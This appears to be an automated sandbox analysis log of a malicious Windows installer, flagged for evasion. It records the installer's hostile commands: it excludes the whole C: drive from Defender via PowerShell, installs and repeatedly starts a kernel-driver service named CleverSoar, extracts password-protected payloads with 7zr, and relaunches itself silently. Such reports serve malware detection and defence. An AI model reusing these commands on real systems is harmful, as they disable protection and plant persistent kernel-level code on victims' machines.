Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB81950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB84754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: String function: 6CDD4F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: String function: 6CD37240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 0063FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 005A1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 005A28E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007F2EA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000000.1714612417.00000000002F9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.000000000370E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal88.evad.winEXE@141/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD04B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005A9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005B3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005A9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD04050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\is-8QQJB.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | File created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Virustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
